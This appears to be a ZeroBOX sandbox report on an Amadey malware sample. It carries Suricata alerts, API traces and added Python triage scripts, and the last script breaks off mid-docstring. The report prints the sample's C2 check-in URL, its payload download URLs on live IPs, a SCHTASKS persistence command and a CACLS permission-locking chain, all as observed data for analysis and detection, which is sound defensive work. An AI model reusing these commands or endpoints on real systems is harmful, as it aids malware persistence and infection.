Summary | ZeroBOX

ummaa.exe

Tags: Amadey, Malicious Library, UPX, Malicious Packer, PE64, PE File, OS Processor Check, PE32

Category: FILE
Machine: s1_win7_x6403_us
Started: Sept. 2, 2023, 6:26 p.m.
Completed: Sept. 2, 2023, 6:29 p.m.
Size: 588.5KB
Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: 58bc43389c3e720c0af4ff563d5ed7ce
SHA256: 4d7a22a1f7d76310b2c8420cb2f02ef4633cb689e4b8eaaab165731b9341163f
CRC32: A5D011EC
ssdeep: 12288:ZR1BzB+BS5RMmF6We5AQtL8Luq2qL5e+iNqajC2UrhOhmfnRl:ZR1BzBGS5RMmF6We5AQKLJ2qjIqa1Ur5
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name | Response | Post-Analysis Lookup
No hosts contacted.

IP Address | Status | Action
164.124.101.2 | Active | Moloch
45.9.74.80 | Active | Moloch
5.42.65.80 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2014819 | ET INFO Packed Executable Download | Misc activity
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2044696 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 | A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2017598 | ET MALWARE Possible Kelihos.F EXE Download Common Structure | A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2014819 | ET INFO Packed Executable Download | Misc activity
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 5.42.65.80:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic
TCP 5.42.65.80:80 -> 192.168.56.103:49176 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation
TCP 5.42.65.80:80 -> 192.168.56.103:49176 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic
TCP 5.42.65.80:80 -> 192.168.56.103:49176 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2044696 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 | A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 | 2044696 | ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 | A Network Trojan was detected
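The table above mixes two kinds of host: 45.9.74.80 fires Amadey-specific ET MALWARE rules (check-in, bot POST, host-fingerprint exfil) and also serves executables, while 5.42.65.80 only trips generic download and hunting rules. The script below is an added example, not part of the ZeroBOX report or of Suricata: it parses rows in the report's "Flow SID Signature Category" layout and labels each remote host as C2 or payload server. ALERT_LINES is a subset copied from the table; the role labels, the category list used to split signature from category, and the guest-network prefix are this example's own assumptions.

```python
"""Triage of the Suricata alert rows above.

Added example (not part of the ZeroBOX report or of Suricata): parses rows in
the report's "Flow SID Signature Category" layout, groups them by remote host,
and separates hosts that fired malware-family C2 signatures from hosts that
only served an executable.  ALERT_LINES is a subset copied from the table
above; the role labels, the category list and the guest-network prefix are
this example's own assumptions.
"""
import re
from collections import defaultdict

# Constructed from the report's Suricata table (one alert per line).
ALERT_LINES = """\
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 45.9.74.80:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 45.9.74.80:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49176 -> 5.42.65.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 5.42.65.80:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.65.80:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
"""

# The classification text Suricata appends after the signature message.  The
# report runs both together, so each row is split on a known category suffix.
CATEGORIES = (
    "Malware Command and Control Activity Detected",
    "A Network Trojan was detected",
    "Potentially Bad Traffic",
    "Potential Corporate Privacy Violation",
    "Misc activity",
)

ROW_RE = re.compile(
    r"^(?P<proto>\w+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<sid>\d+)\s+(?P<rest>.+)$"
)
GUEST_NET = "192.168.56."  # sandbox guest network seen in the report (assumption)


def parse_alert(line):
    """Return one alert as a dict, or None if the line is not a table row."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    category = next((c for c in CATEGORIES if rest.endswith(c)), "")
    signature = rest[: len(rest) - len(category)].strip()
    # The remote side is whichever endpoint is not in the guest network.
    remote = m.group("dst") if m.group("src").startswith(GUEST_NET) else m.group("src")
    return {"sid": int(m.group("sid")), "remote": remote,
            "signature": signature, "category": category}


def triage(text):
    """Group alerts by remote host and assign each host a role.

    'c2'      - at least one ET MALWARE signature fired (check-in, bot, exfil)
    'payload' - only download / policy / hunting signatures fired
    """
    hosts = defaultdict(lambda: {"sids": set(), "malware": set()})
    for line in text.splitlines():
        alert = parse_alert(line)
        if alert is None:
            continue
        host = hosts[alert["remote"]]
        host["sids"].add(alert["sid"])
        if alert["signature"].startswith("ET MALWARE"):
            host["malware"].add(alert["signature"])
    return {
        ip: {"role": "c2" if h["malware"] else "payload",
             "sids": sorted(h["sids"]),
             "malware_signatures": sorted(h["malware"])}
        for ip, h in hosts.items()
    }


if __name__ == "__main__":
    for ip, info in triage(ALERT_LINES).items():
        print(ip, info["role"], info["sids"], info["malware_signatures"])
```

Splitting on a known category suffix matters because a Suricata message can itself contain words like "Malware"; matching the fixed classification strings from the end of the row keeps the SID's message intact for later lookup.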

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA (one call per character; every call logged with console_handle 0x00000007 and status 1, return 1, repeated 0)

buffer, single-byte buffers concatenated in the order logged: AreyousureYNprocessedfile
(These are the alphanumeric characters of the CACLS "Are you sure (Y/N)?" prompt and its "processed file:" line; the spaces and punctuation were not captured in the trace.)

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA (one call per character, logged as above)

buffer, concatenated: processedfile

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA (one call per character, logged as above; the trace stops mid-prompt)

buffer, concatenated: Areyousur
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: POST method with no referer header, POST method with no useragent header, Connection to IP address
suspicious_request: POST http://45.9.74.80/0bjdn2Z/index.php
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://45.9.74.80/softtool.exe
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://45.9.74.80/alldata.exe
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://5.42.65.80/4t.exe
request: POST http://45.9.74.80/0bjdn2Z/index.php
request: GET http://45.9.74.80/softtool.exe
request: GET http://45.9.74.80/alldata.exe
request: GET http://5.42.65.80/4t.exe
request: POST http://45.9.74.80/0bjdn2Z/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2128
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2421000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2abb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002110000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000021c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2422000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2424000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92caa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cbc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92dd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92d60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ccb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92cfc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ccd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe92ca2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
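The memory trace above is long because every RWX allocation and protection change is logged in full. What a practitioner wants out of it is narrower: which processes commit PAGE_EXECUTE_READWRITE memory, and which ones flip existing pages to RWX in the address range where the Win7 x64 guest maps most system DLLs (0x000007fe`xxxxxxxx), since a change there is what an in-memory hook or patch of a loaded module looks like. The script below is an added example, not ZeroBOX code: it parses records in the report's "key: value" layout and reports both per PID. TRACE is a short subset copied from the records above; treating that address range as "module image" is this example's assumption, not something the report states.

```python
"""Pick the DEP-relevant events out of the NtAllocateVirtualMemory /
NtProtectVirtualMemory trace above.

Added example, not ZeroBOX code.  TRACE is a subset of the report's records.
SYSTEM_DLL_RANGE is an assumption: on the Win7 x64 guest most system DLLs are
mapped at 0x000007fe`xxxxxxxx, so an RWX re-protection there is treated as a
candidate patch of a loaded module.
"""
import re

# Copied from the report (three of the records above).
TRACE = """\
NtAllocateVirtualMemory

process_identifier: 2128
region_size: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2328
region_size: 2031616
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2328
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2421000
process_handle: 0xffffffffffffffff
1 0 0
"""

PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
SYSTEM_DLL_RANGE = (0x000007FE00000000, 0x000007FF00000000)  # assumption, see docstring


def _num(value):
    """Leading hex or decimal token of a field value, else the raw string."""
    m = re.match(r"(0x[0-9a-fA-F]+|\d+)", value)
    if not m:
        return value
    tok = m.group(1)
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok)


def parse_records(text):
    """Split the trace into one dict per API call: {'api': name, field: value, ...}."""
    records = []
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if re.fullmatch(r"Nt\w+", line):          # record header, e.g. NtProtectVirtualMemory
            current = {"api": line}
            records.append(current)
        elif current is not None and ": " in line:  # "field: value" line
            key, _, value = line.partition(": ")
            current[key] = _num(value)
        # the trailing "status return repeated" line carries no colon and is skipped
    return records


def dep_findings(text):
    """Per PID: RWX commits and RWX re-protections of pages in the system-DLL range."""
    out = {}
    for r in parse_records(text):
        pid = r.get("process_identifier")
        if pid is None or r.get("protection") != PAGE_EXECUTE_READWRITE:
            continue
        f = out.setdefault(pid, {"rwx_commits": [], "module_rwx": []})
        base = r.get("base_address", 0)
        if r["api"] == "NtAllocateVirtualMemory" and r.get("allocation_type", 0) & MEM_COMMIT:
            f["rwx_commits"].append((base, r.get("region_size", 0)))
        elif r["api"] == "NtProtectVirtualMemory" and SYSTEM_DLL_RANGE[0] <= base < SYSTEM_DLL_RANGE[1]:
            f["module_rwx"].append((base, r.get("length", 0)))
    return out


if __name__ == "__main__":
    for pid, f in dep_findings(TRACE).items():
        print(pid, "rwx commits:", [hex(b) for b, _ in f["rwx_commits"]],
              "module RWX:", [hex(b) for b, _ in f["module_rwx"]])
```

A MEM_RESERVE with RWX protection (the second record) is deliberately not counted: nothing executable exists until the pages are committed, and counting reservations inflates the result on any process that uses a custom heap.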
description oneetx.exe tried to sleep 122 seconds, actually delayed analysis time by 122 seconds
file C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
file C:\Users\test22\AppData\Local\Temp\c149ec7a.exe
file C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
file C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\c149ec7a.exe
file C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
file C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
file C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
file C:\Users\test22\AppData\Local\Temp\newplayer.exe
file C:\Users\test22\AppData\Local\Temp\c149ec7a.exe
file C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
file C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000302001\softtool.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000303001\alldata.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000304001\4t.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ header, "This program cannot be run in DOS mode.", Rich header, then "PE\0\0" followed by machine 0x014C (i386) and a section table of .text, .data, .rsrc, .reloc; the rest of the logged buffer is binary executable content (not reproduced). Printable strings visible in it: "bad allocation", "string too long", "invalid string position", "Unknown exception", LC_TIME / LC_NUMERIC / LC_MONETARY / LC_CTYPE / LC_COLLATE / LC_ALL (MSVC C runtime).
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: a second PE32 image with the same layout (MZ header, DOS stub text, Rich header, PE machine 0x014C, sections .text, .data, .rsrc, .reloc, the same MSVC runtime strings) but a different PE timestamp and section table; binary content not reproduced.
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ header, "This program cannot be run in DOS mode.", then "PE\0\0" followed by machine 0x8664 (x64) with only two sections, .text and .rsrc; the remainder is binary content with no recognisable printable strings (not reproduced).
request_handle: 0x00cc000c
1 1 0
section .rdata: virtual_address 0x00002000, virtual_size 0x00092073, size_of_data 0x00092200, entropy 7.6509165214488; description: A section with a high entropy has been found
entropy 0.994893617021; description: Overall entropy of this PE file is high
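The two entropy findings above are different measures: the first is Shannon entropy of the .rdata bytes (7.65 bits per byte, close to the 8.0 of uniformly random data), the second is a ratio. The script below is an added example, not ZeroBOX code: it computes per-section entropy and reproduces both figures. It reads the 0.9949 "overall" value as the fraction of section bytes that sit in high-entropy sections, with 6.8 bits/byte as the per-section threshold and 0.2 as the ratio threshold; that reading and both thresholds follow the open-source Cuckoo packer_entropy signature as this editor understands it and are assumptions here. The .rdata row is taken from the report; the .text row is constructed so that 0x92200 / total equals the report's ratio (which works out to 0x92E00 bytes of section data), and the byte samples are constructed.

```python
"""Section-entropy check behind the two 'entropy' findings above.

Added example, not ZeroBOX code.  Assumptions: the 'overall' figure is the
share of section bytes in sections whose entropy exceeds HIGH_ENTROPY, and the
finding fires when that share exceeds OVERALL_RATIO (Cuckoo packer_entropy
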